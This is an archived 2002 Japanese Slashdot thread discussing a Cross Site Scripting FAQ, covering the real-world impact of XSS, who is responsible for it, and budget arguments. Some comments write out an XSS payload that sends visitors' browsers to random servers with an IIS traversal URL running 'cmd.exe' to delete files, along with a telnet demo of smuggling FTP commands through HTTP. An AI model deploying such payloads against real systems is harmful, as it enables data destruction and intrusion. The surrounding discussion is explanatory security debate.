パスワードを忘れた? アカウント作成
3051 story

The Cross Site Scripting FAQ 138

ストーリー by Oliver
Scriptさえなければ 部門より

k3c 曰く、 "Cgisecurity.comがThe Cross Site Scripting FAQというドキュメントを公開しています。クロスサイトスクリプティング(XSS)とは何か、という説明から始まって、XSSがもたらす脅威、XSS脆弱性を突く方法の基本、ベンダー側・ユーザー側の対策、有用なリンク集など、一通りの知識が分かりやすくまとめられています。Webアプリケーション開発者はもちろんのこと、「XSSってナニ?食えるの?」というアナタも一読をオススメ。私たちはこんなに危ないWeb世界を彷徨っている。
なお、XSS脆弱性をテストするためのCGIも提供されており、ログを見ることもできます。"

この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。
  • 日本語情報 (スコア:3, 参考になる)

    by shigezo (2455) on 2002年05月22日 21時12分 (#96387) 日記
    /.J内で何度か紹介されたがXSSについてはIPAのこちら [ipa.go.jp]の資料が解りやすいかと

    IPAのこちら [ipa.go.jp]は勉強になりますです。

    重蔵。
    • XSSをはじめとするセキュリティ脆弱性について,昨年の産総研
      オープンハウスにて,産総研の高木浩光さん [aist.go.jp]のプレゼンを
      聞く機会がありました(高木さんの参加するチームが管理する
      SecurIT [etl.go.jp]というサイトで,XSSの危険性に関する論文が
      参照できます。更新が2001/10/18で止まってますが)。

      高木さん曰く:
      管理側(お金を出す側)がXSSの危険性を全然理解していないため,
      多くのWebPageが,セキュリティ対策もされないまま放置されて
      いる。セキュリティ対策の予算や要員を出してくれない。従って,
      XSSをはじめとするセキュリティ脆弱性について,まず管理側を
      啓蒙する必要がある。その啓蒙の材料として,XSSに限らず,
      様々なセキュリティ脆弱性の事例を集めたDBを整備している。

      …との事でした。これが半年ほど前の話です。

      最近はXSS絡みのニュースが多いので,現場の人はXSSについて
      かなり周知されていると思うのですが,管理側の意識はどう
      なのでしょう。いまだに『XSS? ナニソレ?』な人が多いんでしょうか。
      親コメント
  • by Futaro (2025) on 2002年05月23日 3時28分 (#96522) ホームページ 日記
    技術的に「こういう被害がありえる」というお話は、そろそろXSSについては聞きあきてきた(つまり、かなりよくわかってきた)ので、

    1.これまでにどういう被害があったか?
    2.そのさい、どういう対策がとられたか?
    3.被害総額はいくらくらいか?

    という、実際に被害にあった例とその損害を数字で知りたいです。

    なぜかというと、たとえば「包丁は危険です。だから使わないようにしましょう」ということはありえないですよね。

    つまり、技術的な問題だけではなく、社会的な問題、法律、経済なども含めて、それがどのくらいの被害をもたらすものなのか、ということを考えて、対策時に対策コストを算出する必要があるからです。

    たとえば、どんなにXSS脆弱性のあるサイトでも、「ここは別に脆弱性が残っていてもOK」という判断も、技術とは全く別の観点からありえるからです。
    • by jbeef (1278) on 2002年05月23日 5時08分 (#96539) 日記
      情報漏洩型の脆弱性の被害、損害状況を見積もるというのは極めて困難ではないでしょうか。

      被害者が漏洩の原因に気付くことは極めて異例なケースでしょうし、被害があったことにすら気付かないことが多いでしょう。サービスサイトの管理者なら、詳細なログを採っていれば攻撃の可能性を検出することができるかもしれませんが、見つけても自ら外部にそれを明らかにすることはないでしょうし。

      実際に悪質なクロスサイトスクリプティング攻撃の罠が仕掛けられているのが発見されたことがあるか?という点でいうと、あまりないようではありますが、攻撃が無差別なものばかりではないという点に注意が必要です。「セキュリティ対策=ウィルス対策」みたいな風潮が一部にありますが、特定の相手を狙った攻撃というものも現実性が十分にあると思われます。特定の人物のメールを盗み読むといった行為の動機を想像してみるとよいでしょう。 そのような場合には、罠はすぐに消されるでしょうから、見つからないのかもしれません。

      次に、被害状況と対策の必要性とをどう関連づけるかですが、自動車(あるいは包丁)の欠陥の場合と比べてみると、それによって引き起こされるものは事故であるのに対し、セキュリティ脆弱性の場合には、悪意ある者の意志によって起きるか起きないかが決定されるという点が異なります。まさに攻撃されやすい(vulnerable)と表現されるとおりです。しかも、コンピュータにおけるセキュリティ脆弱性の場合には、(1) 100%の再現性がある、(2)犯人が身を隠し易いといった点で特徴的であるので、現時点で被害がないことから対策の必要性を低く見積もることを本当にやってよいのかどうか疑問を感じます。

      最後に、「ここは別に脆弱性が残っていてもOK」という点についてですが、cookieを盗まれる問題以外の脅威については、ユーザが気をつけることで回避できるものです。よそのサイト(あるいはメール中)にあったリンクを辿ってやってきた画面は、たとえアドレスバーのURLが本物のようでも、ニセの内容を見せられているかもしれないと疑う目を持つ、つまり、世の中にはそういう攻撃方法があるのだということを知っておけば、回避できるでしょう。

      ですから、cookieを使っていないサイトであれば、コストの都合でクロスサイトスクリプティング対策をしないというのもアリだと私は思います。ただしその場合は、

      当サイトはクロスサイトスクリプティング対策を行っていません。これこれの危険性がありますので、当サイトご利用の方は、あれこれ、ご自身でお気をつけください。
      と明記しておくべきというのが正論かと思います。が、無理ですか?
      親コメント
      • XSSによる被害を全部出せ、というようなことではなく(もちろん、出ていたらそれにこしたことはないのですが)、たとえ一例でも、「こういう実例があった」というのは、この種のお話を上司にして、対策の許可をもらうのに、非常に敷居が低くなるのです。しかしながら、現状どこのページを見ても、ネット上には、IPAも含め「こういう被害があった」という情報がまるでないので、この対策にかかるお金(=対策のための人件費)を捻出してもらうのに苦労をする、ということなのです。

        技術的に見て「これは脅威だ!」というのは大変によくわかる。たとえて言えば、道路の真ん中に大きな穴があいているのは、誰でもわかっている。なのに「その脅威にはまって」「実際に穴に落ちる人がいない」ということであれば、誰もその穴をふさぐ必要を感じない、ということも会社も含めた世の中にはあるんです。

        いいことではないとは思うけれど、「実際に道路の真ん中にある穴に落ちて怪我をしたことがある」という人がいない限り、穴をふさぐ作業に誰もお金をかけようとは思わないわけです。

        たしかに、現状ほとんどの企業や団体がお金をあまり使えない状態にあるし、XSS対策をとる=道路の穴をふさぐより、もっと緊急で大きな問題を抱えていることが普通です。だから、対策の優先順位を上げてもらうために、どこかにその実例はないか?と探しているところなのですが、この実例が全然ないんですよね。。。。挙句の果ては「技術屋が趣味でみつけたどうでもいいことをさも大変なことのように、自己顕示欲を満足させたいために騒ぎ立てている」なんて言われちゃう始末なんです。

        システム管理者の愚痴になってしまいましたが。。。。
        親コメント
        • 道路の真ん中に空いている大きな穴は、健常者であれば誰にでも気付けるものですし、その穴に落ちると危険だということは、ハイハイしてる赤ちゃんでも予知できることですね。今話題にしている脆弱性もそうですか? 道路の穴のたとえ話もその「上司」の方の作ですか?

          1年前を思い返してみると、IEのセキュリティホールにパッチをあてることの重要性をいくら訴えても、あまり耳を貸してもらえる状況ではありませんでした。新聞やテレビで取り上げられることはけっしてありませんでしたし、パソコン雑誌ですら頑なに取り上げることを拒否するほどでした。あるセキュリティ専門機関に訴えても、「それって実際の被害が出るの?」と疑われる始末。そのときもやはり「個別のターゲットを狙った攻撃は起きていても知ることは困難」と先のコメントと同じことを説明したものです。

          それがどうですか、9月18日のNimdaワームの登場で世の中はすっかり変わりました。もう一般の方にでさえ説明はいらなくなりました。

          つまり、どういうことですか。

          親コメント
          • うちの会社の上司はそういうことだ、ということだけなんですが。

            技術に強い人じゃないですし。。。。私を責められても私が困るだけで、解決にはならないのですが。

            「そんな会社やめちゃえ!」ということを言われているのでしたら、それは私の事情もあって今はできないことですし、こちらの会社の事情や私の個人的な事情をお話しても、そういう解決をjbeefさんにしていただけるとも思いませんし。

            おふとぴになるので、ここはこれで失礼させていただきますが。
            親コメント
            • #96515 [srad.jp]や#96529で出ている脅威は問題にならないのでしょうか。
              そういう解決をjbeefさんにしていただけるとも思いませんし。
              しかし、ほんとに必要と思ったら、そういう拒否パターンに関する情報集積も重要だと思いますよ。(外務/農水/雪印と見ていると…)

              #怖いのでAC
      • 当サイトはクロスサイトスクリプティング対策を行っていません。これこれの危険性がありますので、当サイトご利 用の方は、あれこれ、ご自身でお気をつけください。 と明記しておくべきというのが正論かと思います。が、無理ですか?

        それは無理というより、やることに対してメリットがないということで誰もやらないでしょうね。

        たぶん、「(クロスサイトスクリプティング対策に限らず)個人情報の流出の危険性を明示していなかったので、それを知らずに利用したため自分たちの個人情報の流出し損害を受けた(ないしは危険性に晒された)」という内容の訴訟でも起きて、多額の賠償金を支払う羽目になる実例が出来れば、こぞって明記してくれるでしょう。:-P

        少なくとも上記のように訴訟沙汰をおこされて万が一・・・を考えた 場合の損失が書いたことによる損失を上回らない限り、最終判断をするお偉いさんも納得しないのが現実ですね。

        親コメント
    • by Anonymous Coward
      >という、実際に被害にあった例とその損害を数字で知りたいです。

      まるで、Microsoftの様な主張ですね;-)
  • by Anonymous Coward on 2002年05月23日 2時10分 (#96507)
    XSSで引き起こされる被害というのは、大きく分けて
    • Cookieを盗まれる
    • ブラウザのセキュリティホールを突いてクライアントにいらん事される(ファイルを読み出されたり消されたり実行ファイルを突っ込まれたり)
    という2種類ですよね。
    前者に付いては、要は「Cookieを盗まれても大丈夫」な仕組みにしておけば問題ない。
    たとえば、セッションキーをCookieで保持するようにしているのであれば、そのセッションキーを生成する時にクライアントのIPアドレスを含むデータをMD5して作るとかすれば、他のIPアドレスからのセッションハイジャックは検出できる。
    Proxy通してると同一IPになっちゃう可能性もあるけど、クライアントが自分でProxyを通すようにしているのであれば、それはクライアントの責任だし、一部CATV局みたいに、強制的にProxy通させているような場合はCATV局の責任。企業とかでFireWall通っている場合にはその企業の責任。
    後者(ブラウザのバグ)は明らかにブラウザ供給者の責任です。

    こうやって考えると、Webページ作成者の責任はごく限られているにも関わらず、「XSS問題は全部Web作成者が責任持って解決すべきだ」とばかりにフォームさえあれば<S>hoge</S>とか書いて回るヤツははっきり言ってウザい。
    更にちょっとでも見つかろうものなら鬼の首でも取ったかのように騒ぎ立てて「○○のサイトは脆弱だ」とか言って回る頭悪そうなヤツもいるし。
    脆弱なのはブラウザなんだよ!!

    • by kei100 (5854) on 2002年05月23日 2時46分 (#96515)
      >こうやって考えると、Webページ作成者の責任はごく限られているにも関わらず、
      >「XSS問題は全部Web作成者が責任持って解決すべきだ」とばかりに
      >フォームさえあれば<S>hoge</S>とか書いて回るヤツははっきり言ってウザい。
      >更にちょっとでも見つかろうものなら鬼の首でも取ったかのように騒ぎ立てて
      >「○○のサイトは脆弱だ」とか言って回る頭悪そうなヤツもいるし。

      それ以外にも、ページの改変を出来ます。

      昔、Officeさんが首相官邸のXSS脆弱性を利用した
      首相コメント(偽)を見れるものを公開してました・・・

      ニュース系サイトや、公的機関のWebPageとかで、ありもしない記事が、
      さも*そのサーバー上に存在しているように見える*
      と言うのは脅威にはならないのでしょうか?

      しかも、外見も文体も変わらなかった場合、やられたことには気づき難いです。

      >脆弱なのはブラウザなんだよ!!
      ブラウザはこの場合ほぼ関係ありません。
       
      --
      私を信じないで、貴方を裏切ってしまうから。
      親コメント
      • by jbeef (1278) on 2002年05月23日 3時53分 (#96529) 日記
        ニュース系サイトや、公的機関のWebPageとかで、ありもしない記事が、 さも*そのサーバー上に存在しているように見える* と言うのは脅威にはならないのでしょうか?
        それくらいだと、「たいしたことねえ」という声も出てくるでしょう。が、ページの改変というのは、目に見える文字列だけでなく、FORM要素のACTION属性なども改変できるわけなので、 一件、銀行のログイン画面のように見えて、口座番号と暗証番号を入れると、実は全然違うサイトに送信してしまう、という恐ろしいことが起こりえますね。office氏によって最近実例が指摘されたのもそれではなかったかな?

        ちなみに、その脅威は、2000年2月のCERT Advisory CA-2000-02 [cert.org] で既に書かれていました。(このCA-2000-02ですが、なぜかcookieの盗み出しのことが書かれてないんですよね…。)

        親コメント
        • 「一件、銀行のログイン画面のように見えて、口座番号と暗証番号を入れると、実は全然違うサイトに送信してしまう、という恐ろしいことが起こりえますね。」

          銀行などではログイン手続きの時には既にSSLが成立しているのに?というのはそれはさておき。 こんなすぐバレて、追跡し易く、かつ、きっちりと犯罪が成

          • 銀行などではログイン手続きの時には既にSSLが成立しているのに?
            SSLであろうがなかろうが関係ないですね。送信先の別サイトをSSLにもするのもよいでしょうし。

            どうにもなかなか正しく理解されないようですね…。

            親コメント
            • > 送信先の別サイトをSSLにもするのもよいでしょうし。

              いっている意味がよくわからないのですが、SSLのX.509認証はなんのためにあるのでしょうか?

              • いっている意味がよくわからないのですが、SSLのX.509認証はなんのためにあるのでしょうか?
                わからないのならそれはクロスサイトスクリプティング脆弱性の脅威をあなたがまだ理解していないということを意味しています。 「FORM要素のACTION属性なども改変できるわけなので」という説明でWeb技術者には理解できると思いますが、 「一見、銀行のログイン画面のように見えて」というのは、本物のその銀行のWebページ上にスクリプトが埋め込まれるのですから、X.509認証もへったくれもありません。
                親コメント
              • 送付先は別サイトなのでは。
                送付してから送付先の証明書を確認して、どうだというの?
                親コメント
              • 警告でませんか?
                #96623 [srad.jp] で 「送信先の別サイトをSSLにする」って書いたの読めなかった?
                親コメント
    • Proxy通してると同一IPになっちゃう可能性もあるけど、クライアントが自分でProxyを通すようにしているのであれば、それはクライアントの責任だし、一部CATV局みたいに、強制的にProxy通させているような場合はCATV局の責任。企業とかでFireWall通っている場合にはその企業の責任
      んな無茶な。

      あと、CATVで同一IPアドレスになるのはProxyを強制しているからではなく、IP Masqueradeでプライベートアドレスを使わせているからだね。

      あと、IPアドレスの完全一致でチェックするようにすると企業ユーザが使えなくなる(複数台のProxyサーバで負荷分散しているためにコネクションごとにIPアドレスが変わる)ことが多いのが現実だから、アドレスの最下位を無視するなどして幅を持たせてチェックせざるを得ない。となると、同じプロバイダにダイヤルアップしている者からの攻撃が防げなくなる。

      素人はすっこんでたほうがいいよ。

      親コメント
    • >* Cookieを盗まれる
      >* ブラウザのセキュリティホールを突いてクライアントにいらん事される
      >(ファイルを読み出されたり消されたり実行ファイルを突っ込まれたり)
      これはあくまでXSSで引き起こされる被害の一部です。
      ブラウザで可能なことであればほとんど出来ると思います。
      例えば、クロスサイトスクリプトの問題がある掲示板に以下のようなコー
      ドを含んだ発言を書き込めば、この掲示板を開いたブラウザは勝手に任
      意のサーバーに攻撃を仕掛けることが可能になります。
      <script>
      ip = Math.round(Math.random()*253+1)+"." + Math.round(Math.random()*255) + "." + Mathround(Math.eandom()*255) + ".Math.round(Math.random()*253+1);
       window.open("http://"+ip+"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+del+*.*");
      </script>
      この手の例で有名なのはfushianaさんトラップがありますよね?まあ
      ちょっと考えればこれを利用してワームを作ることも可能でしょう。
      ちなみに、クリックすることで起動可能にするのであれば、FTPやSMTP
      などについても攻撃可能にすることは可能だと思われます。TEXTエリア
      に必要なコマンドを埋め込み、http://hoge.com:21/にPOSTで送信す
      れば。。。
      では、掲示板タイプでないものであれば安全か?と言うとそういうこと
      もないと思います。インパクトがあるのは書き換えですよね。そのほか
      にも踏み台として利用したりてことが考えられます。

      ところで、ECサイト等のクロスサイトスクリプトには怪しいページか
      らのリンクでなければ問題ないと言うのがありますが、なにも怪しいペ
      ージからのリンクでなくてもメールを利用してしまえば簡単に悪意ある
      コードを実行させることが可能だと思います。
      例えば、「プレゼントセール実施中」等というメールにコードを含んだ
      リンクを埋め込んでおけばたいていの人は引っかかるのではないでしょ
      うか?
      XSSを使えば自分の手を汚さないで結構悪いことが出来るので危険だと
      思うのですが世間一般の認識はなんか低いですよねぇ?
      親コメント
      • コードが消えてしまったみたいなので...。
        サンプルコードはこうなります。
        <script>
        ip = Math.round(Math.random()*253+1)+"." + Math.round(Math.random()*255) + "." + Mathround(Math.eandom()*255) + ".Math.round(Math.random()*253+1);  window.open("http://"+ip+"/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+del+*.*");
        </script>
        親コメント
        • 「コードが消えてしまった」のではなく、そのまま
          <script>....</script>
          が書き込めてしまったようですね。HTMLソースを参照。

          どうしてだろう?<script>は削除されるようになっているはずなのに。
          バグのようですが、再現方法がわからない。

          今 #96960にアクセスすると、スクリプトエラーが出るよ。
          エラーでよかった。本当にヤバいコードだから、動いていたら大変なところだった。
          親コメント
        • </script> ←ここには</script>を埋め込んでいます。
          ページが途切れる問題が発生したのを緊急回避するためです。
          親コメント
        • ガガーン!再現してしまった。プレビューでは問題なかったのに、投稿したら問題が再現。
          #97122は、以下のように書いたのでした。(今回は全角文字にて回避)

          ========
          「コードが消えてしまった」のではなく、そのまま
          <script>...</script>
          が書き込めてしまったようですね。HTMLソースを参照。

          どうしてだろう?<script>は削除されるようになっているはずなのに。
          バグのようですが、再現方法がわからない。

          今 #96960にアクセスすると、スクリプトエラーが出るよ。
          エラーでよかった。本当にヤバいコードだから、動いていたら大変なところだった。
          ========

          しかも、二つ目の<script>に対応する</script>が無いために、ページがそこで途切れてしまう状態にもなってしまった。
          上の「←ここには</script>を埋め込んでいます。」というのはその対策です。(意味がわからない方は、HTMLソースを見てください。)

          バグ報告せねば…(汗
          親コメント
          • 二つ目の<script>に対応する</script>が無いために、ページがそこで途切れてしまう状態にもなってしまった。
            上の「←ここには</script>を埋め込んでいます。」というのはその対策です。
            この障害の影響で、現在、「古い順」以外の表示では、異常が発生する(ページの途中がすっぽ抜けて多数のコメントが消える)状態ですので、閲覧される方はご注意を。
            親コメント
          • うぎゃぁースクリプトが実行されていたんですか?いやぁ不幸中の幸いでエラーがあってよかったです^^;)。
            なぁんか出てないなぁと思い、ソースは見たんですが、実行されてなかったので(調べてみたら、JAVAscript実行できないようにしていたんで当然なんですが)気にもしなかったんです。

            さて、このような問題があってもXSSは大した問題じゃないという人はいるんでしょうか?まあ、JAVAScriptを実行しないようにしていれば問題ないんですけどね。
            親コメント
            • すっかり謝るのを忘れてました。皆さん、変なスクリプトを書いてしまってごめんなさい。
              別に、皆さんを陥れようと思ってやったわけじゃないんです。
              出きれば、#96960のスクリプト削除してもらえないですか?湖面と丸ごとでもいいです。お願いします。
              親コメント
          • バグ報告をしたところ、その日のうちに対策して頂きました。ありがとうございます。 ある形式でタグを書くと、プレビューではエスケープされて表示されていたのが、投稿されたコメントの表示ではエスケープされていなかったようです。これがエスケープされるように修正したとの連絡を頂いています。なお既に崩れてしまっている部分については、修正が大変とのこと。たしかにそうなのだろうとお察しします。お疲れです。
            親コメント
      • by gk-hyn (7889) on 2002年05月23日 20時34分 (#96974)
        http://hoge.com:21/にPOSTで送信すれば。。。
        httpと書いて有る以上、ブラウザはhttpでしゃべりにいくと思いますが。
        具体的には、POST / HTTP/1.1以下のHTTPヘッダが最初につきますし。
        そのようなものを、たとえばftp鯖がすんなり受け入れるとは思えないのですが
        親コメント
        • by ikepyon (613) on 2002年05月23日 20時41分 (#96979) 日記
          ところがどっこい。telnetを使ってftpなどに接続してみれば分かりますが、
          $ telnet localhost 21
          Trying 127.0.0.1...
          Connected to localhost.localdomain (127.0.0.1).
          Escape character is '^]'.
          220 ProFTPD 1.2.1 Server (ProFTPD) [hoge]
          GET / HTTP/1.0
          500 GET not understood.
          Host: fdsjkl
          500 HOST: not understood.
          Content-Length: 100
          500 CONTENT-LENGTH: not understood.

          USER hoge
          331 Password required for hoge.
          pass HOGE
          530 Login incorrect.

          とまぁ、間違ったコマンドは無視してしまうわけです。これをうまく使えば
          必要なコマンドを発行できるわけですね。これを多分securityfocusのメーリングリストだったと思いますが見たときはちょっと驚いてしまいました。
          親コメント
    • 脆弱なのは ブラウザじゃなくてスクリプトだろ?
      <s>hoge</s>なんてのを通しちゃうチョロいスクリプトを置いちゃう「Webページ作成者」の責任ってのは本当に『ごく限られている』のか?
      分かってないなら語るなよ。『はっきり言ってウザい』から。

      あとAC投稿を否定するつもりは毛頭無いけどさ、『フォームさえあれば~』ってのは例えば別コメントに出てるOfficeさんの事を言ってるんだろうけど、半端知識で語
    • > こうやって考えると、Webページ作成者の責任はごく限られているにも関わらず、「XSS問題は全部Web作成者が責任持って解決すべきだ」とばかりにフォームさえあれば<S>hoge</S>とか書いて回るヤツははっきり言ってウザい。
      > 更にちょっとでも見
  • by nekurai (6253) on 2002年05月23日 10時04分 (#96595) 日記

    クロスサイトスクリプティングの略称として「XSS」という表記って一般的なんでしょうか?

    #単に私がセキュリティ音痴という事もあるんですが ^^;;;
    こういうタレこみの中であれば通じるんですがそうでない文章の中にいきなり出てきたら何の事かさっぱりさっぱり・・・ CSS でなく XSS とするのは Cascading Style Sheets と間違えないようにする為? (共に web site の話で出てきやすいし)

    • cross や ex が「X」で略されるのは結構普通なのではないかと。

      XSSが一般的かどうかについてはまた別の話でしょうけど。
      --
      -+- 想像力を超え「創造力」をも凌駕する、それが『妄想力』!! -+-
      親コメント
    • Re:XSS(オフトピ) (スコア:2, 参考になる)

      by Fortune (6210) on 2002年05月23日 11時36分 (#96627) 日記
      とりあえず、私は/.Jでしかこの表記を見た事無いですね。
      実際はHotWiredなど一部で使用されているようですが。
      /.Jで、初めてこの表記が出てきたのはこのコメント [srad.jp]かな

      まぁ今のところ、
      「クロスサイトスクリプティング(以下CSS)とは~」や
      「CSS(Cross Site Scripting)とは~」
      みたいに、略称だけを使わないようにするのが一番かと思います。

      ちなみに今、Googleで調べると
      "Cross Site Scripting" CSS [google.co.jp]」は約3,260件
      "Cross Site Scripting" XSS [google.co.jp]」は約350件
      と、まだまだCSSのほうが普及しているようです。
      親コメント
  • by yendot (7022) on 2002年05月23日 17時06分 (#96843)
    なぜ今になってこの問題が大きく取り上げられているんだろう?
    本当に問題ならば、1,2年も前に危惧されるはずだったろうに。
typodupeerror

未知のハックに一心不乱に取り組んだ結果、私は自然の法則を変えてしまった -- あるハッカー

読み込み中...